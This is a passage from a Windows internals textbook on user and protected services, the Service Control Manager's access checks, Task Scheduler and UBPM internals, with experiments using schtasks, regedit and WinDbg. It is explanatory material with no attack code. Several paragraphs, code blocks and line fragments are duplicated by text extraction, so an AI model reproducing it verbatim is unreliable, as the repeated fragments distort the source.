CHAPTER 10 Management, diagnostics, and tracing
As discussed previously, the name of a user service instance is generated by combining the
original name of the service and a local unique ID (LUID) generated by the User Manager for
identifying the user’s interactive session (internally called context ID). The context ID for the
interactive logon session is stored in the volatile HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\VolatileUserMgrKey\ <Session ID>\<User SID>\contextLuid registry
value, where <Session ID> and <User SID> identify the logon session ID and the user SID. If you
open the Registry Editor and navigate to this key, you will find the same context ID value as the
one used for generating the user service instance name.
Figure 10-22 shows an example of a user service instance, the Clipboard User Service, which is run
using the token of the currently logged-on user. The generated context ID for session 1 is 0x3a182, as
shown by the User Manager volatile registry key (see the previous experiment for details). The SCM
then calls ScCreateService, which creates a service record in the SCM database. The new service record
represents a new user service instance and is saved in the registry as for normal services. The service
security descriptor, all the dependent services, and the triggers information are copied from the user
service template to the new user instance service.
FIGURE 10-22 The Clipboard User Service instance running in the context ID 0x3a182.
As discussed previously, the name of a user service instance is generated by combining the
original name of the service and a local unique ID (LUID) generated by the User Manager for
identifying the user’s interactive session (internally called context ID). The context ID for the
interactive logon session is stored in the volatile HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\VolatileUserMgrKey\ <Session ID>\<User SID>\contextLuid registry
value, where <Session ID> and <User SID> identify the logon session ID and the user SID. If you
open the Registry Editor and navigate to this key, you will find the same context ID value as the
one used for generating the user service instance name.
CHAPTER 10 Management, diagnostics, and tracing
473
The SCM registers the eventual service triggers (see the “Triggered-start services” section earlier in
this chapter for details) and then starts the service (if its start type is set to SERVICE_AUTO_START). As
discussed in the “Service logon” section, when SCM starts a process hosting a user service, it assigns the
token of the current logged-on user and the WIN://ScmUserService security attribute used by the SCM
to recognize that the process is really hosting a service. Figure 10-23 shows that, after a user has logged
in to the system, both the instance and template subkeys are stored in the root services key represent-
ing the same user service. The instance subkey is deleted on user logoff and ignored if it’s still present
at system startup time.
FIGURE 10-23 User service instance and template registry keys.
Packaged services
As briefly introduced in the “Service logon” section, since Windows 10 Anniversary Update (RS1), the
Service Control Manager has supported packaged services. A packaged service is identified through the
SERVICE_PKG_SERVICE (512) flag set in its service type. Packaged services have been designed mainly to
support standard Win32 desktop applications (which may run with an associated service) converted to
the new Modern Application Model. The Desktop App Converter is indeed able to convert a Win32 ap-
plication to a Centennial app, which runs in a lightweight container, internally called Helium. More details
on the Modern Application Model are available in the “Packaged application” section of Chapter 8.
When starting a packaged service, the SCM reads the package information from the registry, and, as
for standard Centennial applications, calls into the AppInfo service. The latter verifies that the package
information exists in the state repository and the integrity of all the application package files. It then
stamps the new service’s host process token with the correct security attributes. The process is then
launched in a suspended state using CreateProcessAsUser API (including the Package Full Name at-
tribute) and a Helium container is created, which will apply registry redirection and Virtual File System
(VFS) as for regular Centennial applications.
474
CHAPTER 10 Management, diagnostics, and tracing
Protected services
Chapter 3 of Part 1 described in detail the architecture of protected processes and protected processes
light (PPL). The Windows 8.1 Service Control Manager supports protected services. At the time of this
writing, a service can have four levels of protection: Windows, Windows light, Antimalware light, and
App. A service control program can specify the protection of a service using the ChangeServiceConfig2
API (with the SERVICE_CONFIG_LAUNCH_ PROTECTED information level). A service’s main executable (or
library in the case of shared services) must be signed properly for running as a protected service, follow-
ing the same rules as for protected processes (which means that the system checks the digital signature’s
EKU and root certificate and generates a maximum signer level, as explained in Chapter 3 of Part 1).
A service’s hosting process launched as protected guarantees a certain kind of protection with
respect to other nonprotected processes. They can’t acquire some access rights while trying to access
a protected service’s hosting process, depending on the protection level. (The mechanism is identical
to standard protected processes. A classic example is a nonprotected process not being able to inject
any kind of code in a protected service.)
Even processes launched under the SYSTEM account can’t access a protected process. However,
the SCM should be fully able to access a protected service’s hosting process. So, Wininit.exe launches the
SCM by specifying the maximum user-mode protection level: WinTcb Light. Figure 10-24 shows the
digital signature of the SCM main executable, services.exe, which includes the Windows TCB Component
EKU (1.3.6.1.4.1.311.10.3.23).
FIGURE 10-24 The Service Control Manager main executable (service.exe) digital certificate.
CHAPTER 10 Management, diagnostics, and tracing
475
The second part of protection is brought by the Service Control Manager. While a client requests an
action to be performed on a protected service, the SCM calls the ScCheckServiceProtectedProcess rou-
tine with the goal to check whether the caller has enough access rights to perform the requested action
on the service. Table 10-13 lists the denied operations when requested by a nonprotected process on a
protected service.
TABLE 10-13 List of denied operations while requested from nonprotected client
Involved API Name
Operation
Description
ChangeServiceConfig2
Change Service
Configuration
Any change of configuration to a protected service is denied.
SetServiceObjectSecurity
Set a new security descrip-
tor to a service
Application of a new security descriptor to a protected service
is denied. (It could lower the service attack surface.)
DeleteService
Delete a Service
Nonprotected process can’t delete a protected service.
ControlService
Send a control code to a
service
Only service-defined control code and SERVICE_CONTROL_
INTERROGATE are allowed for nonprotected callers.
SERVICE_CONTROL_STOP is allowed for any protection level
except for Antimalware.
The ScCheckServiceProtectedProcess function looks up the service record from the caller-specified
service handle and, in case the service is not protected, always grants access. Otherwise, it imperson-
ates the client process token, obtains its process protection level, and implements the following rules:
I
If the request is a STOP control request and the target service is not protected at Antimalware
level, grant the access (Antimalware protected services are not stoppable by non-protected
processes).
I
In case the TrustedInstaller service SID is present in the client’s token groups or is set as the
token user, the SCM grants access regarding the client’s process protection.
I
Otherwise, it calls RtlTestProtectedAccess, which performs the same checks implemented for
protected processes. The access is granted only if the client process has a compatible protection
level with the target service. For example, a Windows protected process can always operate on
all protected service levels, while an antimalware PPL can only operate on Antimalware and app
protected services.
Noteworthy is that the last check described is not executed for any client process running with the
TrustedInstaller virtual service account. This is by design. When Windows Update installs an update, it
should be able to start, stop, and control any kind of service without requiring itself to be signed with a
strong digital signature (which could expose Windows Update to an undesired attack surface).
Task scheduling and UBPM
Various Windows components have traditionally been in charge of managing hosted or background
tasks as the operating system has increased in complexity in features, from the Service Control
Manager, described earlier, to the DCOM Server Launcher and the WMI Provider—all of which are also
476
CHAPTER 10 Management, diagnostics, and tracing
responsible for the execution of out-of-process, hosted code. Although modern versions of Windows
use the Background Broker Infrastructure to manage the majority of background tasks of modern ap-
plications (see Chapter 8 for more details), the Task Scheduler is still the main component that manages
Win32 tasks. Windows implements a Unified Background Process Manager (UBPM), which handles
tasks managed by the Task Scheduler.
The Task Scheduler service (Schedule) is implemented in the Schedsvc.dll library and started in a
shared Svchost process. The Task Scheduler service maintains the tasks database and hosts UBPM,
which starts and stops tasks and manages their actions and triggers. UBPM uses the services provided
by the Desktop Activity Broker (DAB), the System Events Broker (SEB), and the Resource Manager for
receiving notification when tasks’ triggers are generated. (DAB and SEB are both hosted in the System
Events Broker service, whereas Resource Manager is hosted in the Broker Infrastructure service.) Both
the Task Scheduler and UBPM provide public interfaces exposed over RPC. External applications can
use COM objects to attach to those interfaces and interact with regular Win32 tasks.
The Task Scheduler
The Task Scheduler implements the task store, which provides storage for each task. It also hosts the
Scheduler idle service, which is able to detect when the system enters or exits the idle state, and the
Event trap provider, which helps the Task Scheduler to launch a task upon a change in the machine
state and provides an internal event log triggering system. The Task Scheduler also includes another
component, the UBPM Proxy, which collects all the tasks’ actions and triggers, converts their descrip-
tors to a format that UBPM can understand, and sends them to UBPM.
An overview of the Task Scheduler architecture is shown in Figure 10-25. As highlighted by the
picture, the Task Scheduler works deeply in collaboration with UBPM (both components run in the Task
Scheduler service, which is hosted by a shared Svchost.exe process.) UBPM manages the task’s states
and receives notification from SEB, DAB, and Resource Manager through WNF states.
Powershell/WMI
Schedcli.dll
MsTask.dll
Task Scheduler
(schedsvc.dll)
UbpmProxy
UBPM
Task Host Server (ubpm.dll)
Schedprov.dll
at.exe
Process
WmiPrvSE.exe
Process
Task Control Program
Taskschd.dll
Task
Control
Process
COM
APIs
Taskschd.dll
COM
APIs
COM
APIs
RPCs
RPCs
WNF
WNF
WNF
Task Scheduler
Configuration Tool
Taskschd.dll
Schtasks
Process
COM
RPCs
RPCs
RPCs
Task Scheduler Compat
plugin (taskcomp.dll)
Task Scheduler Service
Desktop Activity
Broker (DAB)
System Events
Broker (SEB)
Resource Manager
BrokerInfrastructure Service
System Events Broker
Service
…
Task Host Client
(taskhostw.exe)
COM Task
Non-Hosted
Task
FIGURE 10-25 The Task Scheduler architecture.
CHAPTER 10 Management, diagnostics, and tracing
477
The Task Scheduler has the important job of exposing the server part of the COM Task Scheduler
APIs. When a Task Control program invokes one of those APIs, the Task Scheduler COM API library
(Taskschd.dll) is loaded in the address space of the application by the COM engine. The library requests
services on behalf of the Task Control Program to the Task Scheduler through RPC interfaces.
In a similar way, the Task Scheduler WMI provider (Schedprov.dll) implements COM classes and
methods able to communicate with the Task Scheduler COM API library. Its WMI classes, properties,
and events can be called from Windows PowerShell through the ScheduledTasks cmdlet (documented
at https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/). Note that the Task Scheduler
includes a Compatibility plug-in, which allows legacy applications, like the AT command, to work with
the Task Scheduler. In the May 2019 Update edition of Windows 10 (19H1), the AT tool has been de-
clared deprecated, and you should instead use schtasks.exe.
Initialization
When started by the Service Control Manager, the Task Scheduler service begins its initialization pro-
cedure. It starts by registering its manifest-based ETW event provider (that has the DE7B24EA-73C8-
4A09-985D-5BDADCFA9017 global unique ID). All the events generated by the Task Scheduler are con-
sumed by UBPM. It then initializes the Credential store, which is a component used to securely access
the user credentials stored by the Credential Manager and the Task store. The latter checks that all the
XML task descriptors located in the Task store’s secondary shadow copy (maintained for compatibility
reasons and usually located in %SystemRoot%\System32\Tasks path) are in sync with the task descrip-
tors located in the Task store cache. The Task store cache is represented by multiple registry keys, with
the root being HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache.
The next step in the Task Scheduler initialization is to initialize UBPM. The Task Scheduler service uses
the UbpmInitialize API exported from UBPM.dll for starting the core components of UBPM. The func-
tion registers an ETW consumer of the Task Scheduler’s event provider and connects to the Resource
Manager. The Resource Manager is a component loaded by the Process State Manager (Psmsrv.dll, in the
context of the Broker Infrastructure service), which drives resource-wise policies based on the machine
state and global resource usage. Resource Manager helps UBPM to manage maintenance tasks. Those
types of tasks run only in particular system states, like when the workstation CPU usage is low, when
game mode is off, the user is not physically present, and so on. UBPM initialization code then retrieves
the WNF state names representing the task’s conditions from the System Event Broker: AC power, Idle
Workstation, IP address or network available, Workstation switching to Battery power. (Those conditions
are visible in the Conditions sheet of the Create Task dialog box of the Task Scheduler MMC plug-in.)
UBPM initializes its internal thread pool worker threads, obtains system power capabilities, reads a
list of the maintenance and critical task actions (from the HKLM\System\CurrentControlSet\Control\
Ubpm registry key and group policy settings) and subscribes to system power settings notifications
(in that way UBPM knows when the system changes its power state).
The execution control returns to the Task Scheduler, which finally registers the global RPC interfaces
of both itself and UBPM. Those interfaces are used by the Task Scheduler API client-side DLL (Taskschd.dll)
to provide a way for client processes to interact via the Task Scheduler via the Task Scheduler COM
interfaces, which are documented at https://docs.microsoft.com/en-us/windows/win32/api/taskschd/.
478
CHAPTER 10 Management, diagnostics, and tracing
After the initialization is complete, the Task store enumerates all the tasks that are installed in the
system and starts each of them. Tasks are stored in the cache in four groups: Boot, logon, plain, and
Maintenance task. Each group has an associated subkey, called Index Group Tasks key, located in the
Task store’s root registry key (HKLM\ SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\
TaskCache, as introduced previously). Inside each Index Tasks group key is one subkey per each task,
identified through a global unique identifier (GUID). The Task Scheduler enumerates the names of all
the group’s subkeys, and, for each of them, opens the relative Task’s master key, which is located in the
Tasks subkey of the Task store’s root registry key. Figure 10-26 shows a sample boot task, which has the
{0C7D8A27-9B28-49F1-979C-AD37C4D290B1} GUID. The task GUID is listed in the figure as one of the
first entries in the Boot index group key. The figure also shows the master Task key, which stores binary
data in the registry to entirely describe the task.
FIGURE 10-26 A boot task master key.
The task’s master key contains all the information that describes the task. Two properties of the task
are the most important: Triggers, which describe the conditions that will trigger the task, and Actions,
which describe what happen when the task is executed. Both properties are stored in binary registry
values (named “Triggers” and “Actions,”, as shown in Figure 10-26). The Task Scheduler first reads the
hash of the entire task descriptor (stored in the Hash registry value); then it reads all the task’s configu-
ration data and the binary data for triggers and actions. After parsing this data, it adds each identified
trigger and action descriptor to an internal list.
CHAPTER 10 Management, diagnostics, and tracing
479
The Task Scheduler then recalculates the SHA256 hash of the new task descriptor (which includes
all the data read from the registry) and compares it with the expected value. If the two hashes do not
match, the Task Scheduler opens the XML file associated with the task contained in the store’s shadow
copy (the %SystemRoot%\System32\Tasks folder), parses its data and recalculates a new hash, and
finally replaces the task descriptor in the registry. Indeed, tasks can be described by binary data in-
cluded in the registry and also by an XML file, which adhere to a well-defined schema, documented at
https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-schema.
EXPERIMENT: Explore a task’s XML descriptor
Task descriptors, as introduced in this section, are stored by the Task store in two formats: XML
file and in the registry. In this experiment, you will peek at both formats. First, open the Task
Scheduler applet by typing taskschd.msc in the Cortana search box. Expand the Task Scheduler
Library node and all the subnodes until you reach the Microsoft\Windows folder. Explore each
subnode and search for a task that has the Actions tab set to Custom Handler. The action type
is used for describing COM-hosted tasks, which are not supported by the Task Scheduler applet.
In this example, we consider the ProcessMemoryDiagnosticEvents, which can be found under the
MemoryDiagnostics folder, but any task with the Actions set to Custom Handler works well:
Open an administrative command prompt window (by typing CMD in the Cortana search
box and selecting Run As Administrator); then type the following command (replacing the task
path with the one of your choice):
schtasks /query /tn "Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents" /xml
EXPERIMENT: Explore a task’s XML descriptor
Task descriptors, as introduced in this section, are stored by the Task store in two formats: XML
file and in the registry. In this experiment, you will peek at both formats. First, open the Task
Scheduler applet by typing taskschd.msc in the Cortana search box. Expand the Task Scheduler
Library node and all the subnodes until you reach the Microsoft\Windows folder. Explore each
subnode and search for a task that has the Actions tab set to Custom Handler. The action type
is used for describing COM-hosted tasks, which are not supported by the Task Scheduler applet.
In this example, we consider the ProcessMemoryDiagnosticEvents, which can be found under the
MemoryDiagnostics folder, but any task with the Actions set to Custom Handler works well:
Custom Handler works well:
Custom Handler
Open an administrative command prompt window (by typing CMD in the Cortana search
box and selecting Run As Administrator); then type the following command (replacing the task
path with the one of your choice):
schtasks /query /tn "Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents" /xml
480
CHAPTER 10 Management, diagnostics, and tracing
The output shows the task’s XML descriptor, which includes the Task’s security descriptor
(used to protect the task for being opened by unauthorized identities), the task’s author and de-
scription, the security principal that should run it, the task settings, and task triggers and actions:
<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Version>1.0</Version>
<SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>
<Author>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-600)</Author>
<Description>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-603)</Description>
<URI>\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents</URI>
</RegistrationInfo>
<Principals>
<Principal id="LocalAdmin">
<GroupId>S-1-5-32-544</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<AllowHardTerminate>false</AllowHardTerminate>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<Enabled>false</Enabled>
<ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
<Hidden>true</Hidden>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfIdle>true</RunOnlyIfIdle>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>true</RestartOnIdle>
</IdleSettings>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
<EventTrigger>
<Subscription><QueryList><Query Id="0" Path="System"><Select Pa
th="System">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting']
and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></
QueryList></Subscription>
</EventTrigger>
. . . [cut for space reasons] . . .
</Triggers>
<Actions Context="LocalAdmin">
<ComHandler>
<ClassId>{8168E74A-B39F-46D8-ADCD-7BED477B80A3}</ClassId>
<Data><![CDATA[Event]]></Data>
</ComHandler>
</Actions>
</Task>
The output shows the task’s XML descriptor, which includes the Task’s security descriptor
(used to protect the task for being opened by unauthorized identities), the task’s author and de-
scription, the security principal that should run it, the task settings, and task triggers and actions:
<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Version>1.0</Version>
<SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>
<Author>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-600)</Author>
<Description>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-603)</Description>
<URI>\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents</URI>
</RegistrationInfo>
<Principals>
<Principal id="LocalAdmin">
<GroupId>S-1-5-32-544</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<AllowHardTerminate>false</AllowHardTerminate>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<Enabled>false</Enabled>
<ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
<Hidden>true</Hidden>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfIdle>true</RunOnlyIfIdle>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>true</RestartOnIdle>
</IdleSettings>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
<EventTrigger>
<Subscription><QueryList><Query Id="0" Path="System"><Select Pa
th="System">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting']
and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></
QueryList></Subscription>
</EventTrigger>
. . . [cut for space reasons] . . .
</Triggers>
<Actions Context="LocalAdmin">
<ComHandler>
<ClassId>{8168E74A-B39F-46D8-ADCD-7BED477B80A3}</ClassId>
<Data><![CDATA[Event]]></Data>
</ComHandler>
</Actions>
</Task>
CHAPTER 10 Management, diagnostics, and tracing
481
In the case of the ProcessMemoryDiagnosticEvents task, there are multiple ETW triggers (which
allow the task to be executed only when certain diagnostics events are generated. Indeed, the
trigger descriptors include the ETW query specified in XPath format). The only registered action
is a ComHandler, which includes just the CLSID (class ID) of the COM object representing the task.
Open the Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
key. Select Find... from the Edit menu and copy and paste the CLSID located after the ClassID XML
tag of the task descriptor (with or without the curly brackets). You should be able to find the DLL
that implements the ITaskHandler interface representing the task, which will be hosted by the Task
Host client application (Taskhostw.exe, described later in the “Task host client” section):
If you navigate in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\
TaskCache\Tasks registry key, you should also be able to find the GUID of the task descriptor
stored in the Task store cache. To find it, you should search using the task’s URI. Indeed, the
task’s GUID is not stored in the XML configuration file. The data belonging to the task descrip-
tor in the registry is identical to the one stored in the XML configuration file located in the
store’s shadow copy (%systemroot%\System32\Tasks\Microsoft\ Windows\MemoryDiagnostic\
ProcessMemoryDiagnosticEvents). Only the binary format in which it is stored changes.
Enabled tasks should be registered with UBPM. The Task Scheduler calls the RegisterTask function
of the Ubpm Proxy, which first connects to the Credential store, for retrieving the credential used to
start the task, and then processes the list of all actions and triggers (stored in an internal list), convert-
ing them in a format that UBPM can understand. Finally, it calls the UbpmTriggerConsumerRegister API
exported from UBPM.dll. The task is ready to be executed when the right conditions are verified.
Unified Background Process Manager (UBPM)
Traditionally, UBPM was mainly responsible in managing tasks’ life cycles and states (start, stop, enable/
disable, and so on) and to provide notification and triggers support. Windows 8.1 introduced the Broker
Infrastructure and moved all the triggers and notifications management to different brokers that can
In the case of the ProcessMemoryDiagnosticEvents task, there are multiple ETW triggers (which
allow the task to be executed only when certain diagnostics events are generated. Indeed, the
trigger descriptors include the ETW query specified in XPath format). The only registered action
is a ComHandler, which includes just the CLSID (class ID) of the COM object representing the task.
Open the Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
key. Select Find... from the Edit menu and copy and paste the CLSID located after the ClassID XML
tag of the task descriptor (with or without the curly brackets). You should be able to find the DLL
that implements the ITaskHandler interface representing the task, which will be hosted by the Task
Host client application (Taskhostw.exe, described later in the “Task host client” section):
If you navigate in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\
TaskCache\Tasks registry key, you should also be able to find the GUID of the task descriptor
stored in the Task store cache. To find it, you should search using the task’s URI. Indeed, the
task’s GUID is not stored in the XML configuration file. The data belonging to the task descrip-
tor in the registry is identical to the one stored in the XML configuration file located in the
store’s shadow copy (%systemroot%\System32\Tasks\Microsoft\ Windows\MemoryDiagnostic\
ProcessMemoryDiagnosticEvents). Only the binary format in which it is stored changes.
482
CHAPTER 10 Management, diagnostics, and tracing
be used by both Modern and standard Win32 applications. Thus, in Windows 10, UBPM acts as a proxy
for standard Win32 Tasks’ triggers and translates the trigger consumers request to the correct broker.
UBPM is still responsible for providing COM APIs available to applications for the following:
I
Registering and unregistering a trigger consumer, as well as opening and closing a handle to one
I
Generating a notification or a trigger
I
Sending a command to a trigger provider
Similar to the Task Scheduler’s architecture, UBPM is composed of various internal components: Task
Host server and client, COM-based Task Host library, and Event Manager.
Task host server
When one of the System brokers raises an event registered by a UBPM trigger consumer (by publishing
a WNF state change), the UbpmTriggerArrived callback function is executed. UBPM searches the inter-
nal list of a registered task’s triggers (based on the WNF state name) and, when it finds the correct one,
processes the task’s actions. At the time of this writing, only the Launch Executable action is supported.
This action supports both hosted and nonhosted executables. Nonhosted executables are regular
Win32 executables that do not directly interact with UBPM; hosted executables are COM classes that
directly interact with UBPM and need to be hosted by a task host client process. After a host-based
executable (taskhostw.exe) is launched, it can host different tasks, depending on its associated token.
(Host-based executables are very similar to shared Svchost services.)
Like SCM, UBPM supports different types of logon security tokens for task’s host processes. The
UbpmTokenGetTokenForTask function is able to create a new token based on the account information
stored in the task descriptor. The security token generated by UBPM for a task can have one of the fol-
lowing owners: a registered user account, Virtual Service account, Network Service account, or Local
Service account. Unlike SCM, UBPM fully supports Interactive tokens. UBPM uses services exposed by
the User Manager (Usermgr.dll) to enumerate the currently active interactive sessions. For each session,
it compares the User SID specified in the task’s descriptor with the owner of the interactive session. If
the two match, UBPM duplicates the token attached to the interactive session and uses it to log on the
new executable. As a result, interactive tasks can run only with a standard user account. (Noninteractive
tasks can run with all the account types listed previously.)
After the token has been generated, UBPM starts the task’s host process. In case the task is a hosted
COM task, the UbpmFindHost function searches inside an internal list of Taskhostw.exe (task host cli-
ent) process instances. If it finds a process that runs with the same security context of the new task, it
simply sends a Start Task command (which includes the COM task’s name and CLSID) through the task
host local RPC connection and waits for the first response. The task host client process and UBPM are
connected through a static RPC channel (named ubpmtaskhostchannel) and use a connection protocol
similar to the one implemented in the SCM.
CHAPTER 10 Management, diagnostics, and tracing
483
If a compatible client process instance has not been found, or if the task’s host process is a regular
non-COM executable, UBPM builds a new environment block, parses the command line, and creates a
new process in a suspended state using the CreateProcessAsUser API. UBPM runs each task’s host pro-
cess in a Job object, which allows it to quickly set the state of multiple tasks and fine-tune the resources
allocated for background tasks. UBPM searches inside an internal list for Job objects containing host
processes belonging to the same session ID and the same type of tasks (regular, critical, COM-based,
or non-hosted). If it finds a compatible Job, it simply assigns the new process to the Job (by using the
AssignProcessToJobObject API). Otherwise, it creates a new one and adds it to its internal list.
After the Job object has been created, the task is finally ready to be started: the initial process’s
thread is resumed. For COM-hosted tasks, UBPM waits for the initial contact from the task host client
(performed when the client wants to open a RPC communication channel with UBPM, similar to the
way in which Service control applications open a channel to the SCM) and sends the Start Task com-
mand. UBPM finally registers a wait callback on the task’s host process, which allow it to detect when
a task host’s process terminates unexpectedly.
Task Host client
The Task Host client process receives commands from UBPM (Task Host Server) living in the Task
Scheduler service. At initialization time, it opens the local RPC interface that was created by UBPM during
its initialization and loops forever, waiting for commands to come through the channel. Four commands
are currently supported, which are sent over the TaskHostSendResponseReceiveCommand RPC API:
I
Stopping the host
I
Starting a task
I
Stopping a task
I
Terminating a task
All task-based commands are internally implemented by a generic COM task library, and they
essentially result in the creation and destruction of COM components. In particular, hosted tasks
are COM objects that inherit from the ITaskHandler interface. The latter exposes only four required
methods, which correspond to the different task’s state transitions: Start, Stop, Pause, and Resume.
When UBPM sends the command to start a task to its client host process, the latter (Taskhostw.exe)
creates a new thread for the task. The new task worker thread uses the CoCreateInstance func-
tion to create an instance of the ITaskHandler COM object representing the task and calls its Start
method. UBPM knows exactly which CLSID (class unique ID) identifies a particular task: The task’s
CLSID is stored by the Task store in the task’s configuration and is specified at task registration time.
Additionally, hosted tasks use the functions exposed by the ITaskHandlerStatus COM interface to
notify UBPM of their current execution state. The interface uses RPCs to call UbpmReportTaskStatus
and report the new state back to UBPM.
484
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Witnessing a COM-hosted task
In this experiment, you witness how the task host client process loads the COM server DLL that
implements the task. For this experiment, you need the Debugging tools installed on your
system. (You can find the Debugging tools as part of the Windows SDK, which is available at the
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/.) You will enable the
task start’s debugger breakpoint by following these steps:
1.
You need to set up Windbg as the default post-mortem debugger. (You can skip this
step if you have connected a kernel debugger to the target system.) To do that, open an
administrative command prompt and type the following commands:
cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64"
windbg.exe /I
Note that C:\Program Files (x86)\Windows Kits\10\Debuggers\x64 is the path of the
Debugging tools, which can change depending on the debugger’s version and the
setup program.
2.
Windbg should run and show the following message, confirming the success of
the operation:
3.
After you click on the OK button, WinDbg should close automatically.
4.
Open the Task Scheduler applet (by typing taskschd.msc in the command prompt).
5.
Note that unless you have a kernel debugger attached, you can’t enable the initial task’s
breakpoint on noninteractive tasks; otherwise, you won’t be able to interact with the
debugger window, which will be spawned in another noninteractive session.
6.
Looking at the various tasks (refer to the previous experiment, “Explore a task’s XML
descriptor” for further details), you should find an interactive COM task (named
CacheTask) under the \Microsoft\Windows\Wininet path. Remember that the task’s
Actions page should show Custom Handler; otherwise the task is not COM task.
7.
Open the Registry Editor (by typing regedit in the command prompt window) and
navigate to the following registry key: HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Schedule.
8.
Right-click the Schedule key and create a new registry value by selecting Multi-String
Value from the New menu.
EXPERIMENT: Witnessing a COM-hosted task
In this experiment, you witness how the task host client process loads the COM server DLL that
implements the task. For this experiment, you need the Debugging tools installed on your
system. (You can find the Debugging tools as part of the Windows SDK, which is available at the
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/.) You will enable the
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/.) You will enable the
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/
task start’s debugger breakpoint by following these steps:
1.
You need to set up Windbg as the default post-mortem debugger. (You can skip this
step if you have connected a kernel debugger to the target system.) To do that, open an
administrative command prompt and type the following commands:
cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64"
windbg.exe /I
Note that C:\Program Files (x86)\Windows Kits\10\Debuggers\x64 is the path of the
Debugging tools, which can change depending on the debugger’s version and the
setup program.
2.
Windbg should run and show the following message, confirming the success of
the operation:
3.
After you click on the OK button, WinDbg should close automatically.
OK button, WinDbg should close automatically.
OK
4.
Open the Task Scheduler applet (by typing taskschd.msc in the command prompt).
5.
Note that unless you have a kernel debugger attached, you can’t enable the initial task’s
breakpoint on noninteractive tasks; otherwise, you won’t be able to interact with the
debugger window, which will be spawned in another noninteractive session.
6.
Looking at the various tasks (refer to the previous experiment, “Explore a task’s XML
descriptor” for further details), you should find an interactive COM task (named
CacheTask) under the \Microsoft\Windows\Wininet path. Remember that the task’s
Actions page should show Custom Handler; otherwise the task is not COM task.
7.
Open the Registry Editor (by typing regedit in the command prompt window) and
navigate to the following registry key: HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Schedule.
8.
Right-click the Schedule key and create a new registry value by selecting Multi-String
Value from the New menu.
CHAPTER 10 Management, diagnostics, and tracing
485
9.
Name the new registry value as EnableDebuggerBreakForTaskStart. To enable the initial
task breakpoint, you should insert the full path of the task. In this case, the full path is
\Microsoft\Windows\Wininet\CacheTask. In the previous experiment, the task path has
been referred as the task’s URI.
10. Close the Registry Editor and switch back to the Task Scheduler.
11. Right-click the CacheTask task and select Run.
12. If you have configured everything correctly, a new WinDbg window should appear.
13. Configure the symbols used by the debugger by selecting the Symbol File Path item
from the File menu and by inserting a valid path to the Windows symbol server (see
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/ microsoft-
public-symbols for more details).
14. You should be able to peek at the call stack of the Taskhostw.exe process just before
it was interrupted using the k command:
0:000> k
# Child-SP
RetAddr
Call Site
00 000000a7`01a7f610 00007ff6`0b0337a8 taskhostw!ComTaskMgrBase::[ComTaskMgr]::Sta
rtComTask+0x2c4
01 000000a7`01a7f960 00007ff6`0b033621 taskhostw!StartComTask+0x58
02 000000a7`01a7f9d0 00007ff6`0b033191 taskhostw!UbpmTaskHostWaitForCommands+0x2d1
3 000000a7`01a7fb00 00007ff6`0b035659 taskhostw!wWinMain+0xc1
